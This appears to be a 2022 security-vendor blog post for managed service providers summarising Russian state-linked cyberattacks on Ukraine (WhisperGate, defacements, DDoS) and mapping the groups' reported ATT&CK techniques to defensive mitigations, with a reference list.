What MSPs Need to Know regarding Potential Russian CyberWarfare

February 22, 2022

by Bryson Medlock

What MSPs Need to Know regarding Potential Russian Cyber Warfare

Intelligence suggests Russia has already used cyberwarfare techniques against Ukraine as tensions continue to escalate. Considering this, what threats do MSPs and their clients realistically face? Below we summarize actions already taken by Russian state-sponsored threat actors and provide some information on what can be expected going forward.

Recent Cyber Attack Targeting Ukraine

Beginning January 13, 2022, Microsoft Threat Intelligence Center (MSTIC) began observing samples released of new destructive malware operations (dubbed WhisperGate) targeting multiple Ukrainian organizations. This malware operates in two stages. Stage 1 will overwrite the Master Boot Record (MBR) of a hard drive with a ransom note that includes a Bitcoin address and a Tox ID (Tox is an encrypted messaging protocol). When the system reboots, the ransom note is displayed. Stage 2 locates common file types likely to contain user data and overwrites them. Since the WhisperGate malware overwrites rather than encrypts data the data is not recoverable even if the ransom is paid.

On January 14, 2022, threat actors attempted to deface nearly 70 Ukrainian government websites, including sites for the Ukrainian Ministry of Foreign Affairs, the Ministry of Defense, the State Emergency Service, and others. They only managed to deface 10 and left vague messages to “wait for the worst”. This activity has been attributed to UNC1151, a threat actor group believed to be linked to Belarusian intelligence and is also believed to be associated with the Russian special services. Messages left on the government sites appear to be attempts at creating dissent between native Ukrainian and the Polish minority.

On February 15, 2022, a large-scale DDoS attack targeted Ukraine’s armed forces, defense ministry, public radio, and the 2 largest banks for several hours. The attack managed to bring several vital services offline and left many Ukrainians unable to access their bank accounts, use mobile apps, or issue online payments. During the DDoS attack, users of Privatbank, one of those targeted by the attack, reported receiving alerts from the bank that their ATMs were not working. According to Privatbank, they did not send these messages, and Ukrainian cyber police have stated that “it was an information attack.”

Though we have not seen a recent attack on the Ukrainian power grid, many suspect a potential attack on the Ukrainian power grid as occurred during Russian invasion of Ukraine in 2015 by the APT group known as Sandworm leaving about 230,000 people without electricity for up to 6 hours.

Potential Risks to MSPs and their Clients

Based on the activity so far, we can see Russian state-sponsored APTs have been focused on defense contractors, critical infrastructure (such as internet infrastructure or the power grid), government, and banking targets. MSPs with clients belonging to these groups should review the information below regarding the common vulnerabilities, tactics, and techniques used by Russian state-sponsored APTs. We have also seen in recent years that MSPs are increasingly directly targeted by threat actors as these groups realize that MSPs are critical infrastructure and are a rich target for affecting multiple victims at once.

Vulnerabilities commonly exploited by Russian state-sponsored APTs:

Below is a list of vulnerabilities commonly exploited by Russian state-sponsored APTs according to a report by the CyberSecurity & Infrastructure Security Agency (CISA). Detection signatures for all these vulnerabilities are available in the “Emerging Threats” and “Perch Users” communities for all Perch IDS customers. Both communities are enabled by default for all Perch IDS customers. We recommend an audit of your systems and your clients’ systems for the following vulnerabilities, especially for organizations related to critical infrastructure, government, defense contractors, and financial institutions. Keep in mind that this is not meant to be a comprehensive list of all methods these threat actors might use but a guide to help focus attention on where to start.

MITRE ATT&CK Mappings of Russian State-Sponsored APTs

Below is a summary of common Tactics and Techniques observed in use by Russian state-sponsored APT groups based on a report by the CyberSecurity & Infrastructure Security Agency (CISA), with some additions from the CRU and linked to mitigations that can be deployed to help offset the associated risks. Detection signatures for techniques that fall under the “Initial Access”, “Execution”, and “Persistence” Tactics are available for Perch SIEM customers in the “ConnectWise CRU” collection in the Perch Marketplace. These signatures require the installation of the Perch Log Shipper with Sysmon as a prerequisite.

Tactic

Technique

Procedure

Mitigations

TA0043 - Reconnaissance

T1595.002 - Active Scanning: Vulnerability Scanning

Russian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers.

M1056 - Pre-compromise: This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.

T1598 - Phishing for Information

Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks.

M1054 - Software Configuration: Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross-domain) to perform similar message filtering and validation.

M1017 - User Training: Users can be trained to identify social engineering techniques and spearphishing attempts.

TA0042 - Resource Development

T1587.001 - Develop Capabilities: Malware

Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware.

M1056 - Pre-compromise: This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.

TA0001 - Initial Access

T1190 - Exploit Public Facing Applications

Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks.

M1048 - Application Isolation and Sandboxing: Application isolation will limit what other processes and system features the exploited target can access.

M1050 - Exploit Protection: Web Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from reaching the application.

M1030 - Network Segmentation: Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.

M1026 - Privileged Account Management: Use least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system.

M1051 - Update Software: Update software regularly by employing patch management for externally exposed applications.

M1016 - Vulnerability Scanning: Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.

T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain

Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion.

M1051 - Update Software: A patch management process should be implemented to check unused applications, unmaintained and/or previously vulnerable software, unnecessary features, components, files, and documentation.

M1016 - Vulnerability Scanning: Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.

TA0002 - Execution

T1059.001 - Command and Scripting Interpreter: PowerShell

Russian state-sponsored APT actors have used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and execute other commands.

M1049 - Antivirus/Antimalware: Anti-virus can be used to automatically quarantine suspicious files.

M1045 - Code Signing: Set PowerShell execution policy to execute only signed scripts.

M1042 - Disable or Remove Feature or Program: It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.

M1038 - Execution Prevention: Use application control where appropriate.

M1026 - Privileged Account Management: When PowerShell is necessary, restrict PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.

T1059.003 - Command and Scripting Interpreter: Windows Command Shell

Russian state-sponsored APT actors have used cmd.exe to execute commands on remote machines.

M1038 - Execution Prevention: Use application control where appropriate.

TA0003 - Persistence

T1078 - Valid Accounts

Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks.

M1013 - Application Developer Guidance: Ensure that applications do not store sensitive data or credentials insecurely. (e.g. plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage).

M1027 - Password Policies: Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. When possible, applications that use SSH keys should be updated periodically and properly secured.

M1026 - Privileged Account Management: Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. These audits should also include if default accounts have been enabled, or if new local accounts are created that have not been authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.

M1017 - User Training: Applications may send push notifications to verify a login as a form of multi-factor authentication (MFA). Train users to only accept valid push notifications and to report suspicious push notifications.

TA0006 - Credential Access

T1110.001 - Brute Force: Password Guessing

Russian state-sponsored APT actors have conducted brute-force password guessing campaigns.

M1036 - Account Use Policies: Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out.

M1032 - Multi-factor Authentication: Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.

M1027 - Password Policies: Refer to NIST guidelines when creating password policies.

T1110.003 - Brute Force: Password Spraying

Russian state-sponsored APT actors have conducted password spraying campaigns.

M1036 - Account Use Policies: Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out.

M1032 - Multi-factor Authentication: Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.

M1027 - Password Policies: Refer to NIST guidelines when creating password policies.

T1003.003 - OS Credential Dumping: NTDS

Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database ntds.dit.

M1041 - Encrypt Sensitive Information: Ensure Domain Controller backups are properly secured.

M1027 - Password Policies: Ensure that local administrator accounts have complex, unique passwords across all systems on the network.

M1026 - Privileged Account Management: Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.

M1017 - User Training: Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.

T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting

Russian state-sponsored APT actors have performed “Kerberoasting,” whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking.

M1041 - Encrypt Sensitive Information: Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.

M1027 - Password Policies: Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. Also, consider using Group Managed Service Accounts or another third-party product such as password vaulting.

M1026 - Privileged Account Management: Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators.

T1555 - Credentials from Password Stores

Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords.

M1027 - Password Policies: The password for the user's login keychain can be changed from the user's login password. This increases the complexity for an adversary because they need to know an additional password. Organizations may consider weighing the risk of storing credentials in password stores and web browsers. If system, software, or web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in improper locations.

T1212 - Exploitation for Credential Access

Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability CVE-2020-1472 to obtain access to Windows Active Directory servers.

M1048 - Application Isolation and Sandboxing: Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist.

M1050 - Exploit Protection: Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.

M1019 - Threat Intelligence Program: Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.

M1051 - Update Software: Update software regularly by employing patch management for internal enterprise endpoints and servers.

T1552.004 - Unsecured Credentials: Private Keys

Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates.

M1047 - Audit: Ensure only authorized keys are allowed access to critical resources and audit access lists regularly.

M1041 - Encrypt Sensitive Information: When possible, store keys on separate cryptographic hardware instead of on the local system.

M1027 - Password Policies: Use strong passphrases for private keys to make cracking difficult.

M1022 - Restrict File and Directory Permissions: Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access.

TA0011 - Command and Control

T1090.003 - Proxy: Multi-hop Proxy

Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.

M1037 - Filter Network Traffic: Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like Domain Fronting.

TA0040 - Impact

T1561.002 – Disk Wipe:

Disk Structure Wipe

Russian state-sponsored APT actors have used new malware in a campaign known as WhisperGate that will overwrite the Master Boot Record (MBR) on victim systems with a ransom note. The malware appears to be ransomware at first glance, but this malware destroys the data rather than encrypting it.

M1053 - Data Backup:

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

T1485 – Data Destruction

Russian state-sponsored APT actors have used new malware in a campaign known as WhisperGate that locates common file types on the infected system and then overwrites the files, so they are unrecoverable.

M1053 - Data Backup:

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

T1491.002 – Defacement:

External Defacement

Nearly 70 Ukrainian government websites were defaced with vague warnings to “expect the worst”. This activity has been attributed to a Belarusian APT that is suspected to be pursuing Russian objectives.

M1053 - Data Backup:

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. Ensure backups are stored off system and are protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

T1498.001 – Network Denial of Service:

Direct Network Flood

Russian state-sponsored APT actors launched a DDoS attack targeting Ukrainian armed forces, defense ministry, public radio, and financial institutions.

M1037 - Filter Network Traffic:

When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.

Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted or blocking protocols being used for transport.

As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.

 

References:

https://www.cisa.gov/uscert/ncas/alerts/aa22-011a

https://www.ncsc.gov.uk/news/russia-ddos-involvement-in-ukraine

https://support.recordedfuture.com/hc/en-us/articles/4434859363603

https://therecord.media/hackers-deface-ukrainian-government-websites/

https://www.reuters.com/world/europe/exclusive-ukraine-suspects-group-linked-belarus-intelligence-over-cyberattack-2022-01-15/

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

https://cyberpolice.gov.ua/news/kiberpolicziya-vstanovlyuye-osib-prychetnyx-do-rozsylannya-sms-povidomlen-shhodo-zboyiv-u-roboti-bankomativ-7072/

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf